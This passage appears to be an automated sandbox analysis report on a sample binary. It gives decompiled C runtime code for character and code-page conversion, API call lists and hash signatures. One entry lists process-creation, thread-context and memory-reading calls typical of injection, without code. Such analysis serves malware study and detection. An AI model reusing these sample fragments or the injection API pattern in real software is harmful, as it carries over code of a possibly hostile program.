						_push( *(_t110 + 0x10));
						_push( *((intOrPtr*)(_t110 + 0xc)));
						_t61 = E00A3568B(_t87, _t107, _t125); // executed
						_t109 = _t61;
						if(_t109 == 0) {
							goto L36;
						}
						if(( *(_t110 + 0x10) & 0x00000400) == 0) {
							_t98 = _t109 + _t109;
							_t89 = _t98 + 8;
							__eflags = _t98 - _t89;
							asm("sbb eax, eax");
							__eflags = _t89 & _t61;
							if((_t89 & _t61) == 0) {
								_t103 = 0;
								__eflags = 0;
								L30:
								__eflags = _t103;
								if(__eflags == 0) {
									L35:
									E00A38AE5(_t103);
									goto L36;
								}
								_push(0);
								_push(0);
								_push(0);
								_push(_t109);
								_push(_t103);
								_push( *(_t110 - 8));
								_push(_t82);
								_push( *(_t110 + 0x10));
								_push( *((intOrPtr*)(_t110 + 0xc)));
								_t63 = E00A3568B(_t89, _t109, __eflags);
								__eflags = _t63;
								if(_t63 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags =  *(_t110 + 0x20);
								if( *(_t110 + 0x20) != 0) {
									_push( *(_t110 + 0x20));
									_push( *((intOrPtr*)(_t110 + 0x1c)));
								} else {
									_push(0);
									_push(0);
								}
								_push(WideCharToMultiByte( *(_t110 + 0x24), 0, _t103, _t109, ??, ??, ??, ??));
								_pop(_t109);
								__eflags = _t109;
								if(_t109 != 0) {
									E00A38AE5(_t103);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t92 = _t98 + 8;
							__eflags = _t98 - _t92;
							asm("sbb eax, eax");
							_t67 = _t61 & _t92;
							_t89 = _t98 + 8;
							__eflags = _t67 - 0x400;
							if(_t67 > 0x400) {
								__eflags = _t98 - _t89;
								asm("sbb eax, eax");
								_t69 = E00A34CDB(_t89, _t102, _t67 & _t89);
								_pop(_t89);
								_t103 = _t69;
								__eflags = _t103;
								if(_t103 == 0) {
									goto L35;
								}
								 *_t103 = 0xdddd;
								L28:
								_t103 =  &(_t103[4]);
								goto L30;
							}
							__eflags = _t98 - _t89;
							asm("sbb eax, eax");
							E00A3F1E0();
							_t103 = _t111;
							__eflags = _t103;
							if(_t103 == 0) {
								goto L35;
							}
							 *_t103 = 0xcccc;
							goto L28;
						}
						_t71 =  *(_t110 + 0x20);
						if(_t71 == 0) {
							goto L37;
						}
						_t129 = _t109 - _t71;
						if(_t109 > _t71) {
							goto L36;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(_t71);
						_push( *((intOrPtr*)(_t110 + 0x1c)));
						_push(_t102);
						_push(_t82);
						_push( *(_t110 + 0x10));
						_push( *((intOrPtr*)(_t110 + 0xc)));
						_t109 = E00A3568B(0, _t109, _t129);
						if(_t109 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t73 = _t54 & _t97 + 0x00000008;
					_t87 = _t97 + 8;
					if((_t54 & _t97 + 0x00000008) > 0x400) {
						__eflags = _t97 - _t87;
						asm("sbb eax, eax");
						_t82 = E00A34CDB(_t87, _t100, _t73 & _t87);
						_pop(_t87);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00A3F1E0();
					_t83 = _t111;
					_t82 = _t83;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}

0x00a3a5ea
0x00a3a5eb
0x00a3a5ec
0x00a3a5ed
0x00a3a5f4
0x00a3a5f8
0x00a3a5fc
0x00a3a5fd
0x00a3a5ff
0x00a3a605
0x00a3a60b
0x00a3a60e
0x00a3a60e
0x00a3a611
0x00a3a614
0x00a3a614
0x00a3a611
0x00a3a615
0x00a3a61a
0x00a3a621
0x00a3a624
0x00a3a624
0x00a3a640
0x00a3a646
0x00a3a64b
0x00a3a7de
0x00a3a7e9
0x00a3a7ee
0x00a3a7f1
0x00a3a651
0x00a3a651
0x00a3a654
0x00a3a659
0x00a3a65d
0x00a3a6b1
0x00a3a6b1
0x00a3a6b3
0x00a3a6b5
0x00a3a7d3
0x00a3a7d3
0x00a3a7d5
0x00a3a7d6
0x00a3a7dc
0x00000000
0x00a3a7dd
0x00a3a6c6
0x00a3a6cc
0x00a3a6ce
0x00000000
0x00000000
0x00a3a6d4
0x00a3a6d9
0x00a3a6da
0x00a3a6db
0x00a3a6dc
0x00a3a6dd
0x00a3a6de
0x00a3a6df
0x00a3a6e0
0x00a3a6e3
0x00a3a6e6
0x00a3a6eb
0x00a3a6ef
0x00000000
0x00000000
0x00a3a6fc
0x00a3a736
0x00a3a739
0x00a3a73c
0x00a3a73e
0x00a3a740
0x00a3a742
0x00a3a78e
0x00a3a78e
0x00a3a790
0x00a3a790
0x00a3a792
0x00a3a7cc
0x00a3a7cd
0x00000000
0x00a3a7d2
0x00a3a794
0x00a3a796
0x00a3a798
0x00a3a79a
0x00a3a79b
0x00a3a79c
0x00a3a79f
0x00a3a7a0
0x00a3a7a3
0x00a3a7a6
0x00a3a7ab
0x00a3a7ad
0x00000000
0x00000000
0x00a3a7b1
0x00a3a7b2
0x00a3a7b3
0x00a3a7b6
0x00a3a7f2
0x00a3a7f5
0x00a3a7b8
0x00a3a7b8
0x00a3a7b9
0x00a3a7b9
0x00a3a7c6
0x00a3a7c7
0x00a3a7c8
0x00a3a7ca
0x00a3a7fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3a7ca
0x00a3a744
0x00a3a747
0x00a3a749
0x00a3a74b
0x00a3a74d
0x00a3a750
0x00a3a755
0x00a3a770
0x00a3a772
0x00a3a777
0x00a3a77e
0x00a3a77f
0x00a3a77f
0x00a3a781
0x00000000
0x00000000
0x00a3a783
0x00a3a789
0x00a3a789
0x00000000
0x00a3a789
0x00a3a757
0x00a3a759
0x00a3a75d
0x00a3a762
0x00a3a764
0x00a3a766
0x00000000
0x00000000
0x00a3a768
0x00000000
0x00a3a768
0x00a3a6fe
0x00a3a703
0x00000000
0x00000000
0x00a3a709
0x00a3a70b
0x00000000
0x00000000
0x00a3a713
0x00a3a714
0x00a3a715
0x00a3a716
0x00a3a717
0x00a3a71a
0x00a3a71b
0x00a3a71c
0x00a3a71f
0x00a3a727
0x00a3a72b
0x00000000
0x00000000
0x00000000
0x00a3a731
0x00a3a664
0x00a3a666
0x00a3a668
0x00a3a670
0x00a3a68f
0x00a3a691
0x00a3a69b
0x00a3a69d
0x00a3a69e
0x00a3a6a0
0x00000000
0x00000000
0x00a3a6a6
0x00a3a6ac
0x00a3a6ac
0x00000000
0x00a3a6ac
0x00a3a674
0x00a3a678
0x00a3a67e
0x00a3a67f
0x00a3a681
0x00000000
0x00000000
0x00a3a687
0x00000000
0x00a3a687

APIs

MultiByteToWideChar.KERNEL32(?,4F268F78,00000008,?,00000000,00000000,?,00000000,?,?,?,?,00A3A837,00000001,00000001,00000000), ref: 00A3A640
__alloca_probe_16.LIBCMT ref: 00A3A678
MultiByteToWideChar.KERNEL32(?,00000001,00000008,?,?,00000000,?,?,?,00A3A837,00000001,00000001,00000000,?,?,?), ref: 00A3A6C6
__alloca_probe_16.LIBCMT ref: 00A3A75D
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000007,00000010,00000000,00000000,?,00000400,?,00000000,00000000,00000000,00000000,00000000), ref: 00A3A7C0
__freea.LIBCMT ref: 00A3A7CD

Part of subcall function 00A34CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A38A6C,00000000,?,?,00A34ED7,?,00000008,?,00A360E1,?,?), ref: 00A34D0D

__freea.LIBCMT ref: 00A3A7D6
__freea.LIBCMT ref: 00A3A7FB

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 1e433d828eb331cc4834f23c83d406e20fafb5671850a87991f982f62e69b627
Instruction ID: 300b0481b5a318b7fa849aab1d2b913f8f89c86bc0fe902b3990d67bf9a50f7b
Opcode Fuzzy Hash: 1e433d828eb331cc4834f23c83d406e20fafb5671850a87991f982f62e69b627
Instruction Fuzzy Hash: 92511472A00226AFEB258F74DDC6EBF7BB9EBA0750F154629F845D6040EB34DC80D661

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BEC5, Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A4BF96
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00A4C1CE

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 8bec369c02fb80119eb6691f58760d01be9b0a197ec7183664f247fb6680f4dc
Instruction ID: 8a7821ead3eac951d3dddfcc3749cf0385a9766f2ac4a1901acb3fde2269dd81
Opcode Fuzzy Hash: 8bec369c02fb80119eb6691f58760d01be9b0a197ec7183664f247fb6680f4dc
Instruction Fuzzy Hash: 0EA13A74E01209EBDB54CF94C858BEEB7B5FF88314F208199E109BB281D7759A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A215, Relevance: 7.9, APIs: 5, Instructions: 416processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A4A36B
GetThreadContext.KERNELBASE(?,00010007), ref: 00A4A38C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A4A3AE

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: ad89b89f9a36770c804e0d2143174f003e2fa6bd1dcff2736629e065d5577345
Instruction ID: 8b067f8d6ba779480a4f2e50e57eed21ed7e73d62f1255afbd9a37837ec51161
Opcode Fuzzy Hash: ad89b89f9a36770c804e0d2143174f003e2fa6bd1dcff2736629e065d5577345
Instruction Fuzzy Hash: FB025979A40208EFDB18CFA8C985FEEB7B5FF98300F248118E605AB281D774E941CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A3568B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE ref: 00A356DE
LCMapStringW.KERNEL32(00000000,00000000,00000000,?,00000000,00000008,?,00000007,?,?,?,?,00000000,00000001,?,000000FF), ref: 00A356FC

Strings

LCMapStringEx, xrefs: 00A3569C, 00A356A6

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 9ec423ef37d102f6b6edfcc01b856404a3439061eb1127b009bf384906346d40
Instruction ID: b8a586e5c3851c640aa18e23f206005f923daecf5bb3bbc832c51bed1aa6e209
Opcode Fuzzy Hash: 9ec423ef37d102f6b6edfcc01b856404a3439061eb1127b009bf384906346d40
Instruction Fuzzy Hash: 72011336940208BBCF129FA4DD02EEE7F62FF88764F414504FA0825160C6738971EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A380BE, Relevance: 3.2, APIs: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A380BE(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xa4dc28; // 0x4f268f78
				_v8 = _t48 ^ _t99;
				_push(_a4);
				_t98 = _a8;
				_t78 = E00A37C8F(__ebx, __eflags);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_push(0);
					_pop(_t81);
					_t51 = 0;
					_v32 = _t81;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xa4de08)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xa4de08)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xa4ec34 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												_push(_t98);
												E00A37D02();
												goto L37;
											}
										} else {
											E00A31E90(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00A37C51( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											_push(_t98); // executed
											E00A37D67(_t78, _t91, _t95, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00A31E90(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xa4de18;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xa4de04; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00A37C51(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xa4de0c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					_push(_t98);
					E00A37D02();
				}
				L39:
				return E00A31B61(_v8 ^ _t99);
			}

0x00a380c6
0x00a380cd
0x00a380d2
0x00a380d5
0x00a380dd
0x00a380e2
0x00a380f3
0x00a380f3
0x00a380f5
0x00a380f6
0x00a380f7
0x00a380f9
0x00a380fc
0x00a380fc
0x00a38102
0x00000000
0x00000000
0x00a38108
0x00a38109
0x00a3810c
0x00a3810f
0x00a38114
0x00000000
0x00a38116
0x00a38116
0x00a3811c
0x00a381ea
0x00a38122
0x00a38122
0x00a38128
0x00000000
0x00a3812e
0x00a38132
0x00a38138
0x00a3813a
0x00000000
0x00a38140
0x00a38145
0x00a3814b
0x00a3814d
0x00a381d7
0x00a381dd
0x00000000
0x00a381df
0x00a381df
0x00a381e0
0x00000000
0x00a381e0
0x00a38153
0x00a3815d
0x00a38162
0x00a3816a
0x00a38170
0x00a38171
0x00a38174
0x00a381c7
0x00a38176
0x00a38176
0x00a3817a
0x00a3817d
0x00a3817f
0x00a3817f
0x00a38182
0x00a38184
0x00000000
0x00000000
0x00a38186
0x00a38189
0x00a38194
0x00a38194
0x00a38196
0x00000000
0x00000000
0x00a3818e
0x00a38193
0x00a38193
0x00a38193
0x00a38198
0x00a3819b
0x00a3819e
0x00000000
0x00000000
0x00000000
0x00a3819e
0x00a3817f
0x00a381a0
0x00a381a0
0x00a381a3
0x00a381a8
0x00a381a8
0x00a381ab
0x00a381ac
0x00a381ac
0x00a381ac
0x00a381bc
0x00a381c2
0x00a381c2
0x00a381cc
0x00a381cf
0x00a381d0
0x00a381d1
0x00a38295
0x00a38295
0x00a38296
0x00a3829b
0x00a3829c
0x00a3829c
0x00a3814d
0x00a3813a
0x00a38128
0x00a3811c
0x00000000
0x00a3829e
0x00a381fc
0x00a38204
0x00a38204
0x00a38208
0x00a3820b
0x00a38211
0x00a38214
0x00a38214
0x00a38217
0x00a38219
0x00a3821b
0x00a3821b
0x00a3821e
0x00a38220
0x00000000
0x00000000
0x00a38222
0x00a38225
0x00a38241
0x00a38241
0x00a38243
0x00000000
0x00000000
0x00a3822a
0x00a38230
0x00a38232
0x00a38238
0x00a3823c
0x00a3823c
0x00a3823d
0x00000000
0x00a3823d
0x00000000
0x00a38230
0x00a38245
0x00a38248
0x00a3824b
0x00000000
0x00000000
0x00000000
0x00a3824b
0x00a3824d
0x00a3824d
0x00a38250
0x00a38251
0x00a38254
0x00a38257
0x00a38257
0x00a3825d
0x00a38260
0x00a3826f
0x00a38278
0x00a3827d
0x00a38283
0x00a38284
0x00a38284
0x00a38287
0x00a3828a
0x00a3828d
0x00a38290
0x00a38290
0x00a38290
0x00000000
0x00a380e4
0x00a380e4
0x00a380e5
0x00a380eb
0x00a3829f
0x00a382ae

APIs

Part of subcall function 00A37C8F: GetOEMCP.KERNEL32(00000000,?,?,00A37F18,?), ref: 00A37CBA

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A37F5D,?,00000000), ref: 00A38132
GetCPInfo.KERNEL32(00000000,00A37F5D,?,?,?,00A37F5D,?,00000000), ref: 00A38145

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: e42f3c694af7a403dcc9a31f741b6e802a74d7b58602d88e66d099cb3b62fa00
Instruction ID: b354aab357de289259d5fd1ff7df2de04d8c2eb736ae4a08754b94cce9d02058
Opcode Fuzzy Hash: e42f3c694af7a403dcc9a31f741b6e802a74d7b58602d88e66d099cb3b62fa00
Instruction Fuzzy Hash: C15133749007059FDB21CFB5C881ABBBBB5EF91310F24856EF0A68B141EB3D9946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AAA5, Relevance: 2.6, APIs: 1, Instructions: 1077COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c11f099dfe5a88cb057298199e029d6b3925208410a13d1f6caee08847ee0dc1
Instruction ID: d2064e68360e78684c8e41cf08ba412e297c851e0aa9372b3c014a8cc26f91c0
Opcode Fuzzy Hash: c11f099dfe5a88cb057298199e029d6b3925208410a13d1f6caee08847ee0dc1
Instruction Fuzzy Hash: 0DA23524A2465896EB24DF60DC557DE7236EF68700F1050E9D20CEB3E4E77A8F81CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00A48005, Relevance: 1.7, APIs: 1, Instructions: 223libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,?), ref: 00A48411

Memory Dump Source

Source File: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0c35e3f65793dcee4103fa5b30ebead1f4f7db4fbf21919369d8679f45f3354e
Instruction ID: ccd2dd81f12e6c5c26174e825b050572fac6f56a414e636356c49685a3102e3c
Opcode Fuzzy Hash: 0c35e3f65793dcee4103fa5b30ebead1f4f7db4fbf21919369d8679f45f3354e
Instruction Fuzzy Hash: 3DC1BA74D14228CAEB24CFA4D980BDDBBB2FF98300F5081AAD50DAB350EB755A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A37D67, Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A37D67(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				void* _t91;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				void* _t98;
				char* _t99;
				intOrPtr _t104;
				signed int _t107;
				void* _t109;

				_pop(_t97);
				_t107 = _t109;
				_t63 =  *0xa4dc28; // 0x4f268f78
				 *(_t107 - 4) = _t63 ^ _t107;
				_t104 =  *((intOrPtr*)(_t107 + 8));
				if(GetCPInfo( *(_t104 + 4), _t107 - 0x718) == 0) {
					_t47 = _t104 + 0x119; // 0x11a
					_t98 = _t47;
					_push(0);
					_pop(_t91);
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t98;
					__eflags = _t68;
					 *(_t107 - 0x720) = _t68;
					do {
						_t99 = _t98 + _t91;
						_t69 = _t68 + _t99;
						 *((intOrPtr*)(_t107 - 0x71c)) = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags =  *((intOrPtr*)(_t107 - 0x71c)) - 0x19;
							if( *((intOrPtr*)(_t107 - 0x71c)) > 0x19) {
								 *_t99 = 0;
							} else {
								_t72 = _t104 + _t91;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t91 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t104 + _t91 + 0x19) =  *(_t104 + _t91 + 0x19) | 0x00000010;
							_t54 = _t91 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t99 = _t73;
						}
						_t68 =  *(_t107 - 0x720);
						_t61 = _t104 + 0x119; // 0x11a
						_t98 = _t61;
						_t91 = _t91 + 1;
						__eflags = _t91 - 0x100;
					} while (_t91 < 0x100);
				} else {
					_push(0);
					_pop(_t74);
					do {
						 *((char*)(_t107 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 =  *(_t107 - 0x712);
					_t94 = _t107 - 0x712;
					 *((char*)(_t107 - 0x104)) = 0x20;
					while(1) {
						_t116 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t97 =  *(_t94 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t97;
							if(_t76 > _t97) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t107 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t94 = _t94 + 2;
						__eflags = _t94;
						_t75 =  *_t94;
					}
					_push(0);
					_push( *(_t104 + 4));
					_push(_t107 - 0x704);
					_push(0x100);
					_push(_t107 - 0x104);
					_push(1);
					_push(0);
					E00A389C8(0, _t97, 0x100, _t104, _t116);
					E00A3A803(0, 0x100, _t104, _t116, 0,  *((intOrPtr*)(_t104 + 0x21c)), 0x100, _t107 - 0x104, 0x100, _t107 - 0x204, 0x100,  *(_t104 + 4), 0); // executed
					E00A3A803(0, 0x100, _t104, _t116, 0,  *((intOrPtr*)(_t104 + 0x21c)), 0x200, _t107 - 0x104, 0x100, _t107 - 0x304, 0x100,  *(_t104 + 4), 0);
					_push(0);
					_pop(_t95);
					do {
						_t86 =  *(_t107 + _t95 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t104 + _t95 + 0x119)) = 0;
							} else {
								_t37 = _t104 + _t95 + 0x19;
								 *_t37 =  *(_t104 + _t95 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t107 + _t95 - 0x304));
								goto L15;
							}
						} else {
							 *(_t104 + _t95 + 0x19) =  *(_t104 + _t95 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t107 + _t95 - 0x204));
							L15:
							 *((char*)(_t104 + _t95 + 0x119)) = _t87;
						}
						_t95 = _t95 + 1;
					} while (_t95 < 0x100);
				}
				return E00A31B61( *(_t107 - 4) ^ _t107);
			}

0x00a37d68
0x00a37d6b
0x00a37d72
0x00a37d79
0x00a37d7e
0x00a37d9b
0x00a37e93
0x00a37e93
0x00a37e99
0x00a37e9a
0x00a37e9b
0x00a37e9c
0x00a37e9c
0x00a37e9e
0x00a37ea4
0x00a37ea4
0x00a37ea6
0x00a37ea8
0x00a37eb1
0x00a37eb4
0x00a37ec0
0x00a37ec7
0x00a37ed7
0x00a37ec9
0x00a37ec9
0x00a37ecc
0x00a37ecc
0x00a37ecc
0x00a37ed0
0x00a37ed0
0x00000000
0x00a37ed0
0x00a37eb6
0x00a37eb6
0x00a37ebb
0x00a37ebb
0x00a37ed3
0x00a37ed3
0x00a37ed3
0x00a37ed9
0x00a37edf
0x00a37edf
0x00a37ee5
0x00a37ee6
0x00a37ee6
0x00a37da1
0x00a37da1
0x00a37da2
0x00a37da3
0x00a37da3
0x00a37daa
0x00a37dab
0x00a37daf
0x00a37db5
0x00a37dbb
0x00a37de3
0x00a37de3
0x00a37de5
0x00000000
0x00000000
0x00a37dc4
0x00a37dc8
0x00a37dda
0x00a37dda
0x00a37ddc
0x00000000
0x00000000
0x00a37dcd
0x00a37dcf
